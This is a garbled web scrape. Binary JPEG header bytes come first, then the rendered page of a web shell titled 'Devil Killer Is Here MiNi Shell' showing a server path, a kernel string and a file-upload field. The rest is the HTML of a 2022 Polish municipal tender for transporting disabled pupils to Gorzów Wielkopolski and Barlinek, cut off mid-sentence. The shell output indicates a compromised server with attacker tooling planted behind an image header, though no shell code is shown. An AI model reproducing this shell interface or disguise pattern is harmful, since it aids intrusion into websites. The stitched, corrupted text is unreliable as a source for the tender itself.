JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220804/0029279501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowóz uczniów niepełnosprawnych do placówek w Gorzowie Wielkopolskim oraz w Barlinku w okresie od 01-09-2022r. do 22-12-2022r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Strzelce Krajeńskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210966763</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Wolności 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelce Krajeńskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">957632578</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@strzelce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strzelce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowóz uczniów niepełnosprawnych do placówek w Gorzowie Wielkopolskim oraz w Barlinku w okresie od 01-09-2022r. do 22-12-2022r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-68defaee-13e7-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00292795</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019769/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Dowóz uczniów niepełnosprawnych do szkół w okresie od 01-09-2022r. do 31-12-2022r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem miniPortalu https://miniportal.uzp.qov.pl/ (wyłącznie pomocne przy składaniu ofert), ePUAPu https://epuap.qov.pl/wps/portal (formularz do komunikacji) oraz poczty elektronicznej - e-mail : urzad@strzelce.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	Administratorem Pani/Pana danych osobowych jest Burmistrz Strzelec Krajeńskich z siedzibą przy Alei Wolności 48; 66-500 Strzelce Krajeńskie; Tel: +48 95 7631130; e-mail:urzad@strzelce.pl <br/>2.	W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych (IOD). Funkcję tę sprawuje: Rafał Andrzejewski. Kontakt z IOD pod adresem email: iod.r.andrzejewski@szkoleniaprawnicze.com.pl oraz telefonicznie pod nr telefonu: 504 976 690.<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w zw. z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U.2021 poz. 1129 ze zm.), dalej „ustawa Pzp” w celu związanym z postępowaniem o udzielenie zamówienia publicznego SCOPO.221.8.2022 pn. „Dowóz uczniów niepełnosprawnych do placówek w Gorzowie Wielkopolskim oraz w Barlinku w okresie od 01-09-2022r. do 22-12-2022r.” prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji (art. 275 pkt. 1 ustawy Pzp)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SCOPO.221.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I<br/>„Dowóz uczniów niepełnosprawnych do placówek w Gorzowie Wielkopolskim w okresie od 01-09-2022r. do 22-12-2022r.” <br/>Uczniowie dowożeni będą pojazdem przystosowanym do przewozu osób niepełnosprawnych z zamontowaną windą, platformą lub podestem ruchomym do wsiadania ucznia na wózku inwalidzkim. Liczba przewożonych uczniów ogółem 5 w tym:<br/>-	2 uczniów przewożonych z miejscowości Gardzko do Ośrodka dla Dzieci i Młodzieży z Autyzmem przy ul. Małyszyńskiej, <br/>-	2 uczniów (w tym jeden uczeń poruszający sie na wózku inwalidzkim) przewożonych z miejscowości Strzelce Krajeńskie do Zespołu Szkół Ogólnokształcących nr 16<br/>-	1 uczeń przewożony z miejscowości Strzelce Krajeńskie do Szkoły Podstawowej SOWA przy ul. Młyńskiej 4.<br/>Wykaz uczniów objętych dowozem, szczegółowa trasa i godziny dowozu oraz wszystkie aspekty związane z bezpieczeństwem dzieci podczas przewozu zostaną szczegółowo ustalone i uzgodnione między Zamawiającym a Wykonawcą po podpisaniu umowy. Liczba uczniów objętych dowozem w okresie od 01-09-2022r. do 22-12-2022r. zostanie uzgodniona z Wykonawcą w innym terminie.<br/>Wykonawca zobowiązany jest do zapewnienia pojazdu przystosowanego do przewozu osób niepełnosprawnych. Pojazd powinien być wyposażony w odpowiednio dostosowany sprzęt ułatwiający wsiadanie i wysiadanie osób poruszających się na wózkach inwalidzkich:<br/>-	winda hydrauliczno – elektryczna, platforma lub podest ruchomy do wprowadzania wózka dopuszczona do użytku przez Urząd Dozoru Technicznego,<br/>-	foteliki zapewniające odpowiednie zabezpieczenie dla przewozu dzieci i wózków,<br/>-	pasy bezpieczeństwa. <br/>Pojazd winien być oznakowany zgodnie z przepisami, posiadać homologację do przewozu wózka inwalidzkiego. Wszystkie wymagane dokumenty dotyczące spełnienia tych warunków należy przedłożyć Zamawiającemu najpóźniej w dniu podpisania umowy. <br/>W sytuacjach awaryjnych Wykonawca zobowiązuje się do zapewnienia transportu zastępczego przystosowanego do przewozu osób niepełnosprawnych. <br/>Wykonawca zobowiązany jest również do zapewnienia opieki poprzez zatrudnienie opiekuna. Opiekę nad dziećmi może sprawować osoba pełnoletnia, zdolna do ponoszenia odpowiedzialności (karnej, cywilnej) za działanie lub zaniechanie w związku ze sprawowaną opieką. Wskazane jest aby opiekun posiadał kwalifikacje z zakresu opieki nad dziećmi niepełnosprawnymi, ukończony kurs pierwszej pomocy przedlekarskiej. <br/>Obowiązki opiekuna:<br/>	a) zapewnienie bezpieczeństwa dzieciom w czasie jazdy do szkół i placówek oraz służenie pomocą dzieciom w czasie jazdy,<br/>b) pomoc dzieciom w czasie wsiadania i wysiadania z pojazdu i przekazania ich pod opiekę osobom (nauczycielom/opiekunom) ze szkoły lub placówki, do której są dowożone,<br/>c) opieka oraz zapewnienie bezpieczeństwa dzieciom w drodze z pojazdu do budynku szkoły/placówki oraz w drodze z budynku szkoły/placówki do pojazdu,<br/>d) odbiór dziecka od rodziców/opiekunów prawnych przed odjazdem i przekazanie rodzicom/opiekunom prawnym po powrocie ze szkoły/placówki. Nie dopuszcza się przekazania dziecka po powrocie osobom nieuprawnionym lub pozostawienie dziecka bez opieki.<br/>Wykaz uczniów objętych dowozem, szczegółowa trasa i godziny dowozu oraz wszystkie aspekty związane z bezpieczeństwem dzieci podczas przewozu zostaną szczegółowo ustalone i uzgodnione między Zamawiającym a Wykonawcą po podpisaniu umowy. Liczba uczniów objętych dowozem w okresie od 01-09-2022r. do 22-12-2022r. zostanie uzgodniona z Wykonawcą w innym terminie.<br/>W razie wystąpienia stanu zagrożenia epidemiologicznego Wykonawca zobowiązany jest do przestrzegania wytycznych nałożonych przez Główny Inspektorat Sanitarny.<br/>- Długość trasy (Gardzko – Strzelce Krajeńskie – Gorzów Wlkp.) ok. 92 km (1 dowóz + 1 przywóz x 46 km) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2022-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia transportu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II<br/>„Dowóz uczniów niepełnosprawnych do placówek w Barlinku w okresie od 01-09-2022r. do 22-12-2022r.”<br/>Uczniowie będą dowożeni do placówki prowadzonej przez Stowarzyszenie Pomocy Dzieciom „Bratek” natomiast osoby dorosłe będą dowożone do Klubu Samopomocy „Bratek” w Barlinku. <br/>Dowożonych będzie 5 niepełnosprawnych uczniów oraz 2 osoby dorosłe niepełnosprawne zamieszkałe w miejscowościach: Sławno – 1 uczeń, Strzelce Krajeńskie – 1 uczeń + 1 osoba dorosła, Wielisławice – 2 uczniów + 1 osoba dorosła, Bobrówko – 1 uczeń.<br/>Wykonawca zobowiązany jest do zapewnienia pojazdu przystosowanego do przewozu osób niepełnosprawnych, wyposażonego w specjalistyczne foteliki samochodowe (z atestem) dla dzieci niepełnosprawnych (min. 1 fotelik dla dzieci niepełnosprawnych o wadze do 50 kg), posiadającego odpowiednie zabezpieczenie (pasy bezpieczeństwa). <br/>Pojazd winien być oznakowany zgodnie z przepisami. Wszystkie wymagane dokumenty dotyczące spełnienia tych warunków należy przedłożyć Zamawiającemu najpóźniej w dniu podpisania umowy. <br/>W sytuacjach awaryjnych Wykonawca zobowiązuje się do zapewnienia transportu zastępczego przystosowanego do przewozu osób niepełnosprawnych. <br/>Wykonawca zobowiązany jest również do zapewnienia opieki, poprzez zatrudnienie 1 opiekuna. Opiekę nad dziećmi może sprawować osoba pełnoletnia, zdolna do ponoszenia odpowiedzialności (karnej, cywilnej) za działanie lub zaniechanie w związku ze sprawowaną opieką. Wymagane jest aby opiekun posiadał kwalifikacje i doświadczenie z zakresu opieki nad dziećmi ze sprzężonymi niepełnosprawnościami, wskazany jest ukończony kurs ratownictwa medycznego. <br/>Obowiązki opiekuna:<br/>a) zapewnienie bezpieczeństwa dzieciom w czasie jazdy do placówki oraz służenie pomocą dzieciom w czasie jazdy<br/>b) pomoc dzieciom w czasie wsiadania i wysiadania z pojazdu i przekazania ich pod opiekę osobom (nauczycielom/opiekunom) placówki do której są dowożone<br/>c)	opieka oraz zapewnienie bezpieczeństwa dzieciom w drodze z pojazdu do budynku placówki oraz w drodze z budynku placówki do pojazdu<br/>d)	odbiór dziecka od rodziców/opiekunów prawnych przed odjazdem i przekazanie rodzicom/opiekunom prawnym po powrocie z placówki. Nie dopuszcza się przekazania dziecka po powrocie osobom nieuprawnionym lub pozostawienie dziecka bez opieki.<br/>Drugi opiekun, który będzie sprawował opiekę w czasie dowozów nad 2 osobami niepełnosprawnymi zostanie zatrudniony i finansowany przez Stowarzyszenie Pomocy Dzieciom „Bratek” w Barlinku.<br/>Wykaz uczniów objętych dowozem, szczegółowa trasa i godziny dowozu oraz wszystkie aspekty związane z bezpieczeństwem dzieci podczas przewozu zostaną szczegółowo ustalone i uzgodnione między Zamawiającym a Wykonawcą po podpisaniu umowy. Liczba uczniów objętych dowozem w okresie od 01-09-2022r. do 22-12-2022r. zostanie uzgodniona z Wykonawcą w innym terminie.<br/>W razie wystąpienia stanu zagrożenia epidemiologicznego Wykonawca zobowiązany jest do przestrzegania wytycznych nałożonych przez Główny Inspektorat Sanitarny.<br/>- Długość trasy (Sławno – Strzelce Krajeńskie – Wielisławice - Bobrówko – Barlinek.) ok. 84 km (1 dowóz + 1 przywóz x 42 km) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2022-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia transportu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">3)	Posiadanie pojazdu przystosowanego do przewozu osób niepełnosprawnych z zamontowaną windą, platformą lub podestem ruchomym (</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: (Część I, II)<br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia wymagań w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający wymaga aby Wykonawca posiadał uprawnienia do prowadzenia działalności w przedmiocie zamówienia tj. aktualną na dzień składania ofert, licencję na wykonywanie krajowego transportu drogowego zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2021r. poz. 919 ze zm.)<br/>3) w zakresie sytuacji ekonomicznej lub finansowej: <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą jak:<br/>Część I 40.000,00 zł (czterdzieści tysięcy złotych) <br/>Część II 40.000,00 zł (czterdzieści tysięcy złotych) <br/>4) w zakresie zdolności technicznej lub zawodowej:<br/>a) Zamawiający żąda przedstawienia wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. <br/>Część I<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże zgodnie z załącznikiem nr 6 do SWZ, że dysponuje minimum 1 pojazdem przystosowanym do przewozu osób niepełnosprawnych (5 osób + 1 opiekun), z windą hydrauliczno-elektryczną, platformą lub podestem ruchomym do wprowadzania wózków inwalidzkich, posiadającym aktualne badania techniczne, z homologacją na wózek inwalidzki wraz z informacją o podstawie do dysponowania pojazdem.<br/> Część II<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże zgodnie z załącznikiem nr 6 do SWZ, że dysponuje minimum 1 pojazdem przystosowanym do przewozu osób niepełnosprawnych (7 osób + 2 opiekunów), posiadającym aktualne badania techniczne wraz z informacją o podstawie do dysponowania pojazdem.<br/>b) Zamawiający żąda przedstawienia wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami.<br/>Część I, II<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia tj. do realizacji zamówienia zapewni co najmniej osoby: minimum 1 kierowca z min. 3 letnim doświadczeniem w zakresie przewozu osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia oferty tj.:<br/>- licencja na transport drogowy osób;<br/>- wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy – w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, według wzoru stanowiącego załącznik nr 4 do SWZ, oraz załączeniem dowodów określających, że te uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie 